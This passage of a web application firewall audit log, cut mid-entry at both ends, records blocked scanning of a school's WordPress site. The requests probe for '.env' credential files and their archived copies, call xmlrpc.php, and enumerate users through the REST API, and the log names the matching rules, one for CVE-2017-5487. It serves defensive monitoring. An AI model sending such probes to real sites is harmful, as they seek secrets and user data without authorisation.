like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e332e4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e332e4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747105591036103 3125 (- - -) Stopwatch2: 1747105591036103 3125; combined=1404, p1=481, p2=891, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e332e4e-Z-- --322df417-A-- [13/May/2025:10:06:35 +0700] aCK3O43mg5f2L4Eof6PI1gAAANg 103.236.140.4 36138 103.236.140.4 8181 --322df417-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --322df417-C-- demo.sayHello --322df417-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --322df417-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747105595915572 5734 (- - -) Stopwatch2: 1747105595915572 5734; combined=4369, p1=500, p2=3627, p3=35, p4=39, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --322df417-Z-- --642acd41-A-- [13/May/2025:10:16:10 +0700] aCK5eq50YiewH3i7i4efowAAAAE 103.236.140.4 36280 103.236.140.4 8181 --642acd41-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.143.102 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --642acd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --642acd41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106170002263 859 (- - -) Stopwatch2: 1747106170002263 859; combined=332, p1=291, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --642acd41-Z-- --862b634d-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKugAAAMo 103.236.140.4 37232 103.236.140.4 8181 --862b634d-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --862b634d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --862b634d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687607853 694 (- - -) Stopwatch2: 1747106687607853 694; combined=266, p1=234, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --862b634d-Z-- --3e376d66-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKuwAAAM0 103.236.140.4 37234 103.236.140.4 8181 --3e376d66-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8 --3e376d66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e376d66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687643292 693 (- - -) Stopwatch2: 1747106687643292 693; combined=252, p1=211, p2=0, p3=0, p4=0, p5=40, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e376d66-Z-- --a6ca394c-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvAAAAMs 103.236.140.4 37236 103.236.140.4 8181 --a6ca394c-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --a6ca394c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ca394c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687660670 657 (- - -) Stopwatch2: 1747106687660670 657; combined=268, p1=236, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ca394c-Z-- --ab8da428-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvQAAAM4 103.236.140.4 37238 103.236.140.4 8181 --ab8da428-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --ab8da428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab8da428-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687731486 629 (- - -) Stopwatch2: 1747106687731486 629; combined=247, p1=213, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab8da428-Z-- --ecc73350-A-- [13/May/2025:10:24:47 +0700] aCK7f4_RcapTWo3LoydOwgAAAEo 103.236.140.4 37240 103.236.140.4 8181 --ecc73350-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --ecc73350-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecc73350-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687765476 719 (- - -) Stopwatch2: 1747106687765476 719; combined=307, p1=272, p2=0, p3=0, p4=0, p5=35, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecc73350-Z-- --ac6aae79-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvgAAAM8 103.236.140.4 37242 103.236.140.4 8181 --ac6aae79-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --ac6aae79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac6aae79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687801012 650 (- - -) Stopwatch2: 1747106687801012 650; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac6aae79-Z-- --1d32fc4f-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKvwAAAMw 103.236.140.4 37244 103.236.140.4 8181 --1d32fc4f-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --1d32fc4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d32fc4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687881189 721 (- - -) Stopwatch2: 1747106687881189 721; combined=291, p1=247, p2=0, p3=0, p4=0, p5=44, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d32fc4f-Z-- --79e2fd6c-A-- [13/May/2025:10:24:47 +0700] aCK7f-O55leZpQyxFsYLOwAAAJI 103.236.140.4 37246 103.236.140.4 8181 --79e2fd6c-B-- GET /.env.rar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --79e2fd6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79e2fd6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687958707 675 (- - -) Stopwatch2: 1747106687958707 675; combined=265, p1=229, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79e2fd6c-Z-- --7100da26-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKwAAAANA 103.236.140.4 37248 103.236.140.4 8181 --7100da26-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 --7100da26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7100da26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106687992873 668 (- - -) Stopwatch2: 1747106687992873 668; combined=273, p1=217, p2=0, p3=0, p4=0, p5=56, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7100da26-Z-- --f846c00e-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwQAAANE 103.236.140.4 37250 103.236.140.4 8181 --f846c00e-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --f846c00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f846c00e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688028079 670 (- - -) Stopwatch2: 1747106688028079 670; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f846c00e-Z-- --88b46b56-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwgAAANI 103.236.140.4 37252 103.236.140.4 8181 --88b46b56-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --88b46b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b46b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688100775 698 (- - -) Stopwatch2: 1747106688100775 698; combined=271, p1=239, p2=0, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b46b56-Z-- --5ee5846a-A-- [13/May/2025:10:24:48 +0700] aCK7gOO55leZpQyxFsYLPAAAAI4 103.236.140.4 37254 103.236.140.4 8181 --5ee5846a-B-- GET /.env.tar HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --5ee5846a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee5846a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688171352 712 (- - -) Stopwatch2: 1747106688171352 712; combined=297, p1=269, p2=0, p3=0, p4=0, p5=28, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee5846a-Z-- --ecd59556-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKwwAAANM 103.236.140.4 37256 103.236.140.4 8181 --ecd59556-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 --ecd59556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecd59556-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688208263 658 (- - -) Stopwatch2: 1747106688208263 658; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecd59556-Z-- --55485c3b-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxAAAANQ 103.236.140.4 37258 103.236.140.4 8181 --55485c3b-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --55485c3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55485c3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688243323 694 (- - -) Stopwatch2: 1747106688243323 694; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55485c3b-Z-- --760b1a3a-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxQAAANU 103.236.140.4 37260 103.236.140.4 8181 --760b1a3a-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 --760b1a3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --760b1a3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688316386 642 (- - -) Stopwatch2: 1747106688316386 642; combined=245, p1=212, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --760b1a3a-Z-- --1f932239-A-- [13/May/2025:10:24:48 +0700] aCK7gI3mg5f2L4Eof6PKxgAAANY 103.236.140.4 37262 103.236.140.4 8181 --1f932239-B-- GET /.env.tar.gz HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --1f932239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f932239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106688393307 695 (- - -) Stopwatch2: 1747106688393307 695; combined=265, p1=230, p2=0, p3=0, p4=0, p5=34, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f932239-Z-- --230b2b1b-A-- [13/May/2025:10:34:42 +0700] aCK90q50YiewH3i7i4ejxgAAAAo 103.236.140.4 52204 103.236.140.4 8181 --230b2b1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.38.75.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.38.75.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --230b2b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --230b2b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] 